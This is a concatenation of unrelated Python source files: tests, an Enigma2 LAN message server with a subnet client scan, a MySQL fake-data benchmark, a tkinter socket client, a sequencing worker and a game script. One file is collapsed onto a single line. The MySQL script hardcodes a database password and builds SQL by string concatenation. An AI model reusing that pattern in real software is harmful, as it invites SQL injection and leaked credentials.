    """Compiling with an f32 argument against an s32 parameter must fail.

    Op metadata is set around the parameter so the error message carries the
    source location (this file's name), which the regexp below checks for.
    """
    c = self._NewComputation()
    c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
    c.ParameterFromNumpy(self.s32_scalar_2)
    c.ClearOpMetadata()
    self.assertRaisesRegexp(
        RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
        r"expected s32\[\], got f32\[\]",
        lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))


if __name__ == "__main__":
  unittest.main()
MessageServer.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' Copyright (C) 2011 cmikula In case of reuse of this source code please do not remove this copyright. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. For more information on the GNU General Public License see: <http://www.gnu.org/licenses/>. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. ''' from __future__ import print_function from __future__ import absolute_import import SocketServer import socket serverInstance = None def getIpAddress(iface): interfaces = [] # parse the interfaces-file try: fp = open('/etc/network/interfaces', 'r') interfaces = fp.readlines() fp.close() except: print("[AdvancedMovieSelection] interfaces - opening failed") currif = "" for i in interfaces: split = i.strip().split(' ') if (split[0] == "iface"): currif = split[1] if (currif == iface): #read information only for available interfaces if (split[0] == "address"): return split[1] return None class TCPHandler(SocketServer.BaseRequestHandler): """ The RequestHandler class for our server. It is instantiated once per connection to the server, and must override the handle() method to implement communication to the client. 
""" def handle(self): try: from .Client import MessageQueue # self.request is the TCP socket connected to the client data = self.request.recv(1024).strip() #print str(self.client_address[0]), "wrote" #print(data) self.request.send(MessageQueue.getRequest(data)) except Exception as e: print(e) class MessageServer(): def __init__(self): global serverInstance if serverInstance: raise Exception("Only one instance of MessageServer is allowed") self.server = None self.active_clients = [] self.host = getIpAddress('eth0') self.port = 20000 self.ip_from = 1 self.ip_to = 254 def start(self): if not self.host: print("[AdvancedMovieSelection] Could not start server, no static host ip") return import threading self.shutdown() self.server = SocketServer.TCPServer((self.host, self.port), TCPHandler) self.t = threading.Thread(target=self.server.serve_forever) self.t.setDaemon(True) # don't hang on exit self.t.start() print("[AdvancedMovieSelection] Server started:", self.host, self.port) def shutdown(self): if self.server: self.server.shutdown() print("[AdvancedMovieSelection] Server stopped:") def reconnect(self, host=None, port=None): if host: self.host = host if port: self.port = port self.start() def getHost(self): return self.host def getPort(self): return self.port def setPort(self, port): self.port = port def findClients(self): from .Client import Client self.active_clients = [] ip = self.host.split(".") ip = "%s.%s.%s" % (ip[0], ip[1], ip[2]) for x in list(range(self.ip_from, self.ip_to + 1)): try: # Connect to server and send data host = "%s.%s" % (ip, x) print("[AdvancedMovieSelection] Try connect to: %s:%s" % (host, self.port)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.1) sock.connect((host, self.port)) sock.close() client = Client(host, self.port) if client.getDeviceName() != "Error": self.active_clients.append(client) except: pass finally: sock.close() def startScanForClients(self): import threading t = 
threading.Thread(target=self.findClients) t.start() def getClients(self): return self.active_clients def setSearchRange(self, ip_from, ip_to): if ip_from > ip_to or ip_to >= 255: return self.ip_from = ip_from self.ip_to = ip_to serverInstance = MessageServer()
achievement_gen.py
from faker import Faker
import random
import numpy as np
import pymysql
import sys
import time

# Single shared Faker instance: constructing Faker() is expensive, so create
# it once at import time instead of once per generated name.
_faker = Faker()


def get_random_name():
    """Return a random person name."""
    return _faker.name()


def get_random_id():
    """Return a random 15-character ID string, each digit drawn from 1..9."""
    return ''.join(str(random.randint(1, 9)) for _ in range(15))


def get_random_score():
    """Return a random per-subject score drawn from N(96, 6)."""
    return int(np.random.normal(96, 6))


def get_random_score2():
    """Return a random comprehensive ("multiple") score drawn from N(250, 8)."""
    return int(np.random.normal(250, 8))


def get_fake_data():
    """Append 60 fake score records to the fixed output text file.

    Writes straight to the file handle instead of the original trick of
    swapping sys.stdout back and forth, which would leave stdout redirected
    if an exception fired mid-loop.
    """
    # Raw string: the original literal contained invalid escape sequences
    # (\p, \m, \F); the byte value of the path is unchanged.
    with open(r"G:\python-learning\mysql\FakeData.txt", "a") as f:
        for _ in range(60):  # generate 60 records as a test
            id_num = get_random_id()
            name = get_random_name()
            chinese = get_random_score()
            math_score = get_random_score()
            english = get_random_score()
            zonghe = get_random_score2()
            total = chinese + math_score + english + zonghe
            print(id_num, name, chinese, math_score, english, zonghe, total, file=f)


# Database connection settings.
config = {
    "host": "127.0.0.1",
    "user": "root",
    "password": "Niejing",
    "database": "compateall"
}


# Benchmark notes kept from the original author (batch size -> seconds):
# 200  -> 13
# 500  -> 35.47   (5000 rows total: 351.86 s)
# 1000 -> 69.14   (9000 rows total: 615.81 s)
def wayOne(g, s):
    """Insert g batches of s rows each, using a parameterized executemany.

    One template record is generated up front; every inserted row reuses its
    scores and gets a unique id/name by appending the batch+row key. This
    mirrors the original benchmark's behavior exactly.
    """
    start = time.time()
    sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values(%s,%s,%s,%s,%s,%s,%s) "
    db = pymysql.connect(**config)
    cursor = db.cursor()
    group = g
    size = s
    id_num = get_random_id()
    name = get_random_name()
    chinese = get_random_score()
    math_score = get_random_score()
    english = get_random_score()
    zonghe = get_random_score2()
    total = chinese + math_score + english + zonghe
    for j in range(group):
        g_start = time.time()
        usersvalues = [
            (str(id_num) + str(j) + str(i), str(name) + str(j) + str(i),
             chinese, math_score, english, zonghe, total)
            for i in range(size)
        ]
        cursor.executemany(sql, usersvalues)
        db.commit()
        print("第%s批结束,耗时%s" % (str(j + 1), str(time.time() - g_start)))
    cursor.close()
    db.close()
    print("数据量%s,总共耗时:%s" % (str(group * size), str(time.time() - start)))


def wayTwo():
    """Insert 990 rows by concatenating one giant VALUES statement.

    WARNING: the SQL is built by string concatenation. A generated name
    containing a quote character (e.g. "O'Brien") will break the statement;
    kept as-is for benchmarking only -- prefer wayOne's parameterized form.
    """
    start = time.time()
    db = pymysql.connect(**config)
    cursor = db.cursor()
    g = 0
    for g in range(1):
        sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values"
        g_start = time.time()
        rows = []
        for _ in range(990):
            id_num = get_random_id()
            name = get_random_name()
            chinese = get_random_score()
            math_score = get_random_score()
            english = get_random_score()
            zonghe = get_random_score2()
            total = chinese + math_score + english + zonghe
            rows.append("(" + str(id_num) + ",'" + str(name) + "'," + str(chinese) + "," + str(math_score) + "," + str(english) + "," + str(zonghe) + "," + str(total) + ")")
        sql += ",".join(rows)
        cursor.execute(sql)
        db.commit()
        print("第%s批结束,耗时%s" % (str(10000), str(time.time() - g_start)))
    cursor.close()
    db.close()
    # NOTE: g ends at 0 (range(1)), so this reports 0 -- preserved from the
    # original for output compatibility.
    print("数据量%s,总共耗时:%s" % (str(g * 10000), str(time.time() - start)))


def theadInsert(size, j):
    """Worker body for threaded inserts: one batch of *size* random rows."""
    print("runing" + str(j))
    db = pymysql.connect(**config)
    cursor = db.cursor()
    g_start = time.time()
    usersvalues = []
    sql = "insert into achievement_source(idcard,name,chinese,math,english,multiple,total)values(%s,%s,%s,%s,%s,%s,%s) "
    for _ in range(size):
        id_num = get_random_id()
        name = get_random_name()
        chinese = get_random_score()
        math_score = get_random_score()
        english = get_random_score()
        zonghe = get_random_score2()
        total = chinese + math_score + english + zonghe
        usersvalues.append((id_num, name, chinese, math_score, english, zonghe, total))
    cursor.executemany(sql, usersvalues)
    db.commit()
    cursor.close()
    db.close()
    print("第%s批结束,耗时%s" % (str(j + 1), str(time.time() - g_start)))


if __name__ == '__main__':
    wayOne(1, 100)
test_imperative_data_loader_exit_func.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys import signal import unittest import multiprocessing import time import paddle.compat as cpt from paddle.fluid.framework import _test_eager_guard if sys.version_info[0] == 2: import Queue as queue else: import queue from paddle.fluid.reader import multiprocess_queue_set, _cleanup, CleanupFuncRegistrar # NOTE: These special functions cannot be detected by the existing coverage mechanism, # so the following unittests are added for these internal functions. 
class TestDygraphDataLoaderCleanUpFunc(unittest.TestCase):
    """Exercises reader._cleanup() against a registered multiprocess queue."""

    def setUp(self):
        # Queue capacity used by every sub-test.
        self.capacity = 10

    def func_test_clear_queue_set(self):
        """Fill a queue registered in multiprocess_queue_set, then clean up.

        Passes as long as _cleanup() drains/releases the queue without
        raising; there is no return value to assert on.
        """
        test_queue = queue.Queue(self.capacity)
        global multiprocess_queue_set
        multiprocess_queue_set.add(test_queue)
        for i in range(0, self.capacity):
            test_queue.put(i)
        _cleanup()

    def test_clear_queue_set(self):
        # Run once under eager mode and once under the default mode.
        with _test_eager_guard():
            self.func_test_clear_queue_set()
        self.func_test_clear_queue_set()


class TestRegisterExitFunc(unittest.TestCase):
    """Exercises CleanupFuncRegistrar's validation and signal wrapping."""

    # This function does not need to do anything; it only has to be callable
    # so it can be registered as a cleanup function.
    def none_func(self):
        pass

    def func_test_not_callable_func(self):
        """Registering a non-callable must raise TypeError mentioning so."""
        exception = None
        try:
            CleanupFuncRegistrar.register(5)
        except TypeError as ex:
            self.assertIn("is not callable", cpt.get_exception_message(ex))
            exception = ex
        # Ensure the TypeError actually fired rather than passing silently.
        self.assertIsNotNone(exception)

    def test_not_callable_func(self):
        with _test_eager_guard():
            self.func_test_not_callable_func()
        self.func_test_not_callable_func()

    def func_test_old_handler_for_sigint(self):
        """Registering over SIGINT must preserve/are chained with the old handler.

        Passes if register() itself does not raise.
        """
        CleanupFuncRegistrar.register(
            function=self.none_func, signals=[signal.SIGINT])

    def test_old_handler_for_sigint(self):
        with _test_eager_guard():
            self.func_test_old_handler_for_sigint()
        self.func_test_old_handler_for_sigint()

    def func_test_signal_wrapper_by_sigchld(self):
        """A child process exit should trigger the SIGCHLD wrapper.

        The wrapper is expected to raise SystemExit in this (parent) process
        when the child terminates; the sleep gives the child time to finish
        and the signal time to be delivered.
        """

        # The child process body does not need to do anything in this case.
        def __test_process__():
            pass

        CleanupFuncRegistrar.register(
            function=self.none_func, signals=[signal.SIGCHLD])

        exception = None
        try:
            test_process = multiprocessing.Process(target=__test_process__)
            test_process.start()
            time.sleep(3)
        except SystemExit as ex:
            exception = ex
        self.assertIsNotNone(exception)

    def test_signal_wrapper_by_sigchld(self):
        with _test_eager_guard():
            self.func_test_signal_wrapper_by_sigchld()
        self.func_test_signal_wrapper_by_sigchld()


if __name__ == '__main__':
    unittest.main()
gui_socket_client.py
import socket
import time
from tkinter import *
import threading


# methods

def quit():
    """Close the main window, ending the GUI loop."""
    global root
    root.destroy()


def start_thread():
    """Read the username from the entry box and start the listener thread."""
    print("start thread")
    global username
    global username_box
    global status_label
    global skip_button
    global t
    username = username_box.get()
    t = threading.Thread(target=listen)
    t.daemon = True
    t.start()
    # Swap the login widgets for the status display.
    username_label.pack_forget()
    username_box.pack_forget()
    login_button.pack_forget()
    status_label = Label(root, text="connecting as {}".format(username))
    status_label.pack()
    skip_button = Button(root, text="skip", command=skip_wait)
    skip_button.pack()
    skip_button['state'] = DISABLED


def skip_wait():
    """Skip the server-imposed pause by zeroing the countdown."""
    global wait_time
    wait_time = 0


def set_label(data):
    """Show *data* as the current status message."""
    global status_label
    status_label.config(text=str(data))


def listen():
    """Connect to the server as *username* and service its messages.

    Protocol (as implemented here): the server either answers the login
    with "Username already in use.." or accepts it; afterwards it sends
    "check" heart-beats or an integer number of seconds to wait.
    """
    global wait_time
    global skip_button
    try:
        try:
            s = socket.socket()
            s.connect((host, port))
            # request with the username
            s.send(str.encode(username))
            data = s.recv(1024).decode('utf-8')
            set_label(data)
            print(data + " as " + username)
            if data == "Username already in use..":
                # Restore the login widgets so the user can pick another name.
                set_label(data)
                username_label.pack()
                username_box.pack()
                login_button.pack()
                skip_button.pack_forget()
                s.close()
                time.sleep(2)
                status_label.pack_forget()
                return
        except Exception as e:
            set_label("Connection could not be established.." + str(e))
            # BUG FIX: previously execution fell through into the receive
            # loop below and kept using the never-connected socket.
            return

        # username available and connected to server
        root.title(username)  # set the window title to username once connected
        # keep listening to the server and send responses
        while True:
            print("data receiving...")
            data = s.recv(1024).decode('utf-8')
            if data == "check":
                # Heart-beat probe; acknowledge and keep waiting.
                s.send(str.encode("check_received"))
                continue
            # BUG FIX: the int() conversion used to run BEFORE the "check"
            # test, so every heart-beat raised ValueError and was reported
            # as a lost connection.
            wait_time = int(data)
            set_label(data)
            count = 0
            # Count down, letting the user skip via the (enabled) button.
            while wait_time > 0:
                count += 1
                skip_button['state'] = NORMAL
                time.sleep(1)
                wait_time -= 1
                set_label(wait_time)
            skip_button['state'] = DISABLED
            set_label("Listening for server..")
            s.send(str.encode(
                "Client {} waited {} seconds for server.".format(username, str(count))))
    except Exception:
        set_label("connection Lost...")


# code
# socket initialization
s = socket.socket()
host = 'localhost'
port = 9999
username = "user1"

# GUI widgets
root = Tk()
root.title('Client')
root.geometry("370x120")
username_label = Label(root, text="Enter username")
username_label.pack()
username_box = Entry(root)
username_box.pack()
login_button = Button(root, text="logon", command=start_thread)
login_button.pack()
quit_button = Button(root, command=quit, text="Quit")
quit_button.pack()

# GUI loop
root.mainloop()
compare_scans.py
# Entry-point script: spins up one scanner thread per account and a status
# printer thread, then idles forever while the daemon threads work.
import logging
import sys
import time
from threading import Thread

from pgnumbra.config import cfg_get, cfg_init
from pgnumbra.console import print_status
from pgnumbra.proxy import init_proxies
from pgnumbra.utils import load_accounts_file

logging.basicConfig(filename="compare_scans.log",
                    level=logging.INFO,
                    format='%(asctime)s [%(threadName)16s][%(module)14s][%(levelname)8s] %(message)s')
log = logging.getLogger(__name__)

# Silence some loggers
logging.getLogger('pgoapi').setLevel(logging.WARNING)

# NOTE(review): not used anywhere in this script -- presumably kept for
# interactive/debug access; verify before removing.
scanners = []

# ===========================================================================

log.info("PGNumbra CompareScans starting up.")

cfg_init()

# NOTE(review): lat/lng are read but not referenced below -- presumably
# cfg_get validates/caches them as a side effect; confirm.
lat = cfg_get('latitude')
lng = cfg_get('longitude')

# This tool only makes sense when comparing multiple accounts from a file.
if not cfg_get('accounts_file'):
    log.error("Comparing accounts only works with --accounts-file.")
    sys.exit(1)

init_proxies()

accounts = load_accounts_file()

# One daemon thread per account; daemon=True so Ctrl-C exits cleanly.
for acc in accounts:
    t = Thread(target=acc.run)
    t.daemon = True
    t.start()

# Start thread to print current status and get user input.
t = Thread(target=print_status, name='status_printer', args=(accounts,))
t.daemon = True
t.start()

# Dummy endless loop: keeps the main thread alive while the daemon
# threads do all the work.
while True:
    time.sleep(1)
worker.py
import multiprocessing
import queue
from queue import Queue
import sys

from spats_shape_seq.pair import Pair
from spats_shape_seq.parse import FastqWriter, SamWriter
from spats_shape_seq.util import _debug, _warn
from spats_shape_seq.mask import PLUS_PLACEHOLDER, MINUS_PLACEHOLDER


class SpatsWorker(object):
    '''Manages multiprocessing aspects of Spats.

    Fans batches of read pairs out to worker processes (or processes them
    inline when only one worker is configured), optionally writing per-pair
    results back to the pair database under a result set id.
    '''

    def __init__(self, run, processor, pair_db, result_set_id = None, force_mask = None):
        # run: Run configuration (num_workers, quiet, masks, _run_limit, ...)
        # processor: pair processor; provides process_pair() and counters
        # pair_db: pair database used for result writeback (may be None)
        # result_set_id: when set, per-pair results are written back under it
        # force_mask: when set, every pair is forced to this mask
        self._run = run
        self._processor = processor
        self._pair_db = pair_db
        self._result_set_id = result_set_id
        self._force_mask = force_mask
        self._workers = []

    def _make_result(self, ident, pair, tagged = False):
        # Flatten one processed pair into the row format consumed by
        # pair_db.add_results(); -1 marks "no site / not applicable".
        res = [ ident,
                pair.target.rowid if pair.target else None,
                pair.mask_label,
                pair.site if pair.has_site else -1,
                pair.end if pair.has_site else -1,
                len(pair.mutations) if pair.mutations else -1,
                pair.multiplicity,
                pair.failure ]
        if tagged:
            res.append(pair.tags)
        return res

    def _worker(self, worker_id):
        # Body of one worker process: consume pair batches from
        # _pairs_to_do until a falsy (None) sentinel arrives, then report
        # this worker's accumulated counters through _pairs_done.
        try:
            processor = self._processor
            processor.reset_counts()
            if self._pair_db:
                self._pair_db.worker_id = worker_id
            writeback = bool(self._result_set_id)
            tagged = processor.uses_tags
            use_quality = self._run._parse_quality
            pair = Pair()
            while True:
                pairs = self._pairs_to_do.get()
                if not pairs:
                    # None sentinel (put by run()): this worker is done.
                    break
                results = []
                for lines in pairs:
                    # lines: (multiplicity, r1, r2, identifier[, q1, q2])
                    # -- inferred from the indexing below; confirm against
                    # the pair iterator's row format.
                    if not pair.set_from_data(lines[3], str(lines[1]), str(lines[2]), lines[0]):
                        print('\nskipping empty pair: {}'.format(lines[3]))
                        continue
                    if use_quality:
                        pair.r1.quality = str(lines[4])
                        pair.r2.quality = str(lines[5])
                    if self._force_mask:
                        pair.set_mask(self._force_mask)
                    processor.process_pair(pair)
                    #if pair.failure:
                    #    print('FAIL: {}'.format(pair.failure))
                    if writeback:
                        results.append(self._make_result(lines[3], pair, tagged))
                if writeback:
                    self._results.put(results)
                if not self._run.quiet:
                    # progress tick: one '.' per batch processed
                    sys.stdout.write('.')#str(worker_id))
                    sys.stdout.flush()
            # NOTE(review): run() unpacks this as (count_data, vect_data),
            # so count_data() presumably returns a 2-tuple -- confirm.
            self._pairs_done.put(processor.counters.count_data())
        except:
            print("**** Worker exception, aborting...")
            raise

    def _createWorkers(self, num_workers):
        # Spawn num_workers processes running _worker.
        for i in range(num_workers):
            worker = multiprocessing.Process(target = self._worker, args = (i,))
            self._workers.append(worker)
            worker.start()
        if not self._run.quiet:
            print("Created {} workers".format(num_workers))

    def _joinWorkers(self):
        # Wait for all spawned worker processes to exit.
        for w in self._workers:
            w.join()

    def run(self, pair_iterator):
        '''Process all pairs yielded by pair_iterator.

        Dispatches to run_simple() when only one worker is configured;
        otherwise acts as the producer feeding batches to the worker
        processes and draining their results/counters.
        '''
        num_workers = max(1, self._run.num_workers or multiprocessing.cpu_count())
        if 1 == num_workers:
            self.run_simple(pair_iterator)
            return

        # Bounded to-do queue applies backpressure on the producer.
        self._pairs_to_do = multiprocessing.Queue(maxsize = 2 * num_workers)
        self._pairs_done = multiprocessing.Queue()
        self._results = multiprocessing.Queue()
        self._createWorkers(num_workers)

        quiet = self._run.quiet
        more_pairs = True
        pair_db = self._pair_db
        writeback = bool(self._result_set_id)
        num_batches = 0
        total = 0
        if writeback:
            # NOTE(review): result_set_id appears unused below
            # (self._result_set_id is referenced directly); confirm.
            result_set_id = self._result_set_id

        def put_batch():
            # Pull one batch from the iterator and enqueue it; raises
            # StopIteration when the input is exhausted.
            pair_info = next(pair_iterator)
            self._pairs_to_do.put(pair_info)
            if not quiet:
                sys.stdout.write('^')
                sys.stdout.flush()
            return sum(p[0] for p in pair_info) # need to take into account multiplicity for reads

        def write_results():
            # Drain everything currently available on the results queue
            # into the pair db; returns the number of batches drained.
            all_results = []
            num_batches = 0
            try:
                while True:
                    all_results.extend(self._results.get(True, 0.01))
                    num_batches += 1
                    if not quiet:
                        sys.stdout.write('v')
                        sys.stdout.flush()
            except queue.Empty:
                pass
            if all_results:
                pair_db.add_results(self._result_set_id, all_results)
            return num_batches

        # Producer loop: keep up to ~2*num_workers batches outstanding,
        # periodically draining results when writeback is enabled.
        while more_pairs:
            try:
                cur_count = 0
                while cur_count < num_workers or num_batches < 2 * num_workers:
                    total += put_batch()
                    num_batches += 1
                    cur_count += 1
                if writeback:
                    num_batches -= write_results()
            except StopIteration:
                more_pairs = False
            except queue.Empty:
                pass

        # Input exhausted: drain any remaining results.
        if writeback:
            while num_batches > 0:
                num_batches -= write_results()

        # put signal objects to indicate we're done
        for i in range(num_workers):
            self._pairs_to_do.put(None)

        processor = self._processor
        # NOTE(review): 'targets' is built but never used below; confirm
        # whether it is a leftover.
        targets = { t.name : t for t in processor._targets.targets }
        accumulated = 0

        def accumulate_counts():
            # Fold counter data reported by finished workers into the
            # main processor's counters; returns how many were consumed.
            num_accumulated = 0
            try:
                while 1 < num_workers:
                    count_data, vect_data = self._pairs_done.get_nowait()
                    processor.counters.update_with_count_data(count_data, vect_data)
                    num_accumulated += 1
                    if not quiet:
                        sys.stdout.write('x')
                        sys.stdout.flush()
            except queue.Empty:
                pass
            return num_accumulated

        # Busy-wait until every worker has reported its counters.
        while accumulated < num_workers:
            accumulated += accumulate_counts()

        if not self._run.quiet:
            print("\nAggregating data...")
        self._joinWorkers()

        processor.counters.total_pairs = total
        #if self._pair_db:
        #    processor.counters.unique_pairs = self._pair_db.unique_pairs()

    def run_simple(self, pair_iterator):
        '''Single-process variant of run().

        Processes pairs inline; additionally supports SAM output and
        per-channel FASTQ output, which the multiprocess path does not.
        '''
        quiet = self._run.quiet
        run_limit = self._run._run_limit
        more_pairs = True
        pair_db = self._pair_db
        writeback = bool(self._result_set_id)
        sam = bool(self._run.generate_sam)
        channel_reads = bool(self._run.generate_channel_reads)
        use_quality = self._run._parse_quality
        total = 0
        if writeback:
            # NOTE(review): result_set_id appears unused below; confirm.
            result_set_id = self._result_set_id
        processor = self._processor
        if self._pair_db:
            self._pair_db.worker_id = 0
        tagged = processor.uses_tags
        pair = Pair()
        if sam:
            sam_writer = SamWriter(self._run.generate_sam, processor._targets.targets)
        if channel_reads:
            plus_writer = FastqWriter('R1_plus.fastq', 'R2_plus.fastq')
            minus_writer = FastqWriter('R1_minus.fastq', 'R2_minus.fastq')
        while more_pairs:
            try:
                while True:
                    pair_info = next(pair_iterator)
                    if not quiet:
                        sys.stdout.write('^')
                        sys.stdout.flush()
                    results = []
                    for lines in pair_info:
                        if not pair.set_from_data(lines[3], str(lines[1]), str(lines[2]), lines[0]):
                            print('\nskipping empty pair: {}'.format(lines[3]))
                            continue
                        if use_quality:
                            pair.r1.quality = str(lines[4])
                            pair.r2.quality = str(lines[5])
                        if self._force_mask:
                            pair.set_mask(self._force_mask)
                        try:
                            processor.process_pair(pair)
                        except:
                            print("**** Error processing pair: {} / {}".format(pair.r1.original_seq, pair.r2.original_seq))
                            raise
                        if sam:
                            sam_writer.write(pair)
                        if channel_reads and pair.has_site:
                            # first mask (or the '+' placeholder) goes to the
                            # plus channel; everything else to minus.
                            if pair.mask_label == self._run.masks[0] or pair.mask_label == PLUS_PLACEHOLDER:
                                plus_writer.write(pair)
                            else:
                                minus_writer.write(pair)
                        total += pair.multiplicity
                        if writeback:
                            results.append(self._make_result(lines[3], pair, tagged))
                    if not quiet:
                        sys.stdout.write('v')
                        sys.stdout.flush()
                    if results:
                        pair_db.add_results(self._result_set_id, results)
                    if not quiet:
                        sys.stdout.write('.')
                        sys.stdout.flush()
                    # Abuse StopIteration to also terminate on run_limit.
                    if run_limit and total > run_limit:
                        raise StopIteration()
            except StopIteration:
                more_pairs = False
        if not self._run.quiet:
            print("\nAggregating data...")
        processor.counters.total_pairs = total
        if self._pair_db:
            processor.counters.unique_pairs = self._pair_db.unique_pairs()
mainscript.py
#
# Parley Who Vertigo
# Copyright 2016, 2017 Thomas Perl, Josef Who
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#

from gameflow import GameFlow
from coroutine import Coroutine
from color import Color, to_rgba32

import psmovecolor

import os
import time
import math
import random
import threading

import sdl
import sdlmixer
import eglo
import fontaine


class MainScript(object):
    """Top-level game driver: owns rendering, sound and the game flow."""

    def __init__(self, api, use_chip):
        # api: controller API object (provides connected_controllers)
        # use_chip: True when running on the embedded board; rendering then
        # happens on a dedicated daemon thread instead of inline in update().
        self.api = api
        self.use_chip = use_chip
        self.coroutines = []
        if self.use_chip:
            # NOTE(review): the render thread starts before self.sounds is
            # assigned below -- harmless only if the thread never touches
            # sounds before __init__ finishes; confirm.
            self._render_thread = threading.Thread(target=self.ui_loop)
            self._render_thread.setDaemon(True)
            self._render_thread.start()
        else:
            self.ui_setup()
        # filename -> loaded sound object cache (see play_sound)
        self.sounds = {}

    def ui_setup(self):
        """Create the EGL output (on-device) or SDL window plus the text renderer."""
        if self.use_chip:
            self.eglo = eglo.EGLO()
        else:
            self.eglo = None
        # NOTE(review): scale is 0 on-device, producing a 0x0 SDL surface --
        # presumably only the mixer side of SDLMixer is used then and output
        # goes through EGLO; confirm.
        scale = 1 if not self.use_chip else 0
        self.screen = self.mixer = sdlmixer.SDLMixer(480*scale, 272*scale)
        self.renderer = fontaine.GLTextRenderer(480, 272, os.path.join(os.path.dirname(__file__), 'art', 'pwv.tile'))
        self.renderer.enable_blending()

    def ui_loop(self):
        """Render-thread body (on-device only): redraw at roughly 20 fps."""
        self.ui_setup()
        while True:
            self.render()
            time.sleep(1./20.)

    def start(self):
        """Begin the game state machine."""
        self.gameflow = GameFlow(self)

    def update(self):
        """Per-frame tick: advance game flow and all scheduled coroutines."""
        self.gameflow.update()
        # Keep only coroutines whose schedule() reports they are still alive.
        self.coroutines = [coroutine for coroutine in self.coroutines if coroutine.schedule()]
        if not self.use_chip:
            self.render()

    def render(self):
        """Draw one frame: background image keyed off the current game, plus debug text on desktop."""
        self.renderer.clear(0.0, 0.0, 0.0, 1.0)
        # Cycle the "Move Says" background color once per second.
        move_says_choices = ['MoveSaysBlue', 'MoveSaysGreen', 'MoveSaysPurple', 'MoveSaysRed']
        move_says_now = move_says_choices[int(time.time())%len(move_says_choices)]
        game_title, game_description, scores = self.gameflow.status_message()
        # Map the active game to its background image; default to the logo.
        image_name = {
            'MoveSays': move_says_now,
            'SafeCracker': 'SafeCrackerNormal',
            'ShakeIt': 'ShakeIt',
            'Freeze': 'Freeze',
            'AttractMode': 'ParleyWhoVertigo3',
        }.get(game_title, 'PWVLogo272')
        image_id = self.renderer.lookup_image(image_name)
        self.renderer.render_image(0, 0, 1.0, 0.0, 0xFFFFFFFF, image_id)
        self.renderer.flush()
        if not self.use_chip:
            # Desktop build: overlay status text for debugging.
            self.renderer.enqueue(10, 10, 1.0, 0.0, 0x888888FF, game_title)
            self.renderer.enqueue(10, 20, 1.0, 0.0, 0x888888FF, game_description)
            self.renderer.enqueue(10, 30, 1.0, 0.0, 0x888888FF, self.gameflow.current_message)
            self.renderer.flush()
        if self.eglo is not None:
            self.eglo.swap_buffers()
        else:
            self.screen.update()

    def start_coroutine(self, crt):
        """Wrap a generator in a Coroutine and schedule it each update()."""
        self.coroutines.append(Coroutine(crt))

    def get_controllers(self):
        """Return the currently connected motion controllers."""
        return self.api.connected_controllers

    def play_sound(self, sound, volume=1.0, pitch=1.0):
        """Play a named sound effect, loading and caching the file on first use.

        NOTE(review): volume and pitch are accepted but not forwarded to
        play() -- presumably unimplemented; confirm.
        """
        filename = {
            'GameWin1Sound': 'game-win1.wav',
            'GameWin2Sound': 'game-win2.wav',
            'WinPlayer1Sound': 'win-player1.wav',
            'WinPlayer2Sound': 'win-player2.wav',
            'ReadySound': 'ready.wav',
            'CycleBlipSound': 'cycle-blip.wav',
            'BeepSound': 'beep.wav',
            'BadBeepSound': 'bad-beep.wav',
            'SafeAnnounceSound': 'safe-announce.wav',
            'SafeClickSound': 'safe-click.wav',
            'BalloonAnnounceSound': 'balloon-announce.wav',
            'BalloonExplosionSound': 'balloon-explosion.wav',
            'SqueakSound': 'squeak.wav',
        }[sound]
        if filename not in self.sounds:
            self.sounds[filename] = self.mixer.load(os.path.join(os.path.dirname(__file__), 'sounds', filename))
        self.sounds[filename].play()
ps5000base.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2017 Pico Technology Ltd. See LICENSE file for terms.
#
"""
Python calls for ps5000 based PicoScope devices.
"""

from threading import *
from picostatus import *
from psutils import *

from math import ceil
from copy import deepcopy
import numpy as np
import sys
import time

""" Defaults """
MAX_INFO_LEN = 64
MAX_NUM_DEVICES = 64
MAX_LOGIC_LEVEL = 32767
MIN_LOGIC_LEVEL = -32767
MAX_LOGIC_VOLTS = 5
STREAM_LENGTH = 1000000


class UnitInfo(dict2class):
    """ Place holder type for device information """
    pass


class Channels(dict2class):
    """ Class defining channels for the current device class """
    A = 0
    B = 1
    C = 2
    D = 3
    map = (A, B, C, D)
    labels = {A: "A", B: "B", C: "C", D: "D"}


class ChannelState(dict2class):
    """ Object describing state of the channel """
    def __init__(self):
        self.enabled = False
        self.coupling = Couplings.dc
        self.range = Ranges.r500mv
        self.offset = 0
        self.overvoltaged = False


class Couplings(dict2class):
    """ Couplings selection """
    ac = 0
    dc = 1
    labels = {ac: "AC", dc: "DC"}


class Ports(dict2class):
    """ Device digital ports selection """
    p0 = 0x80
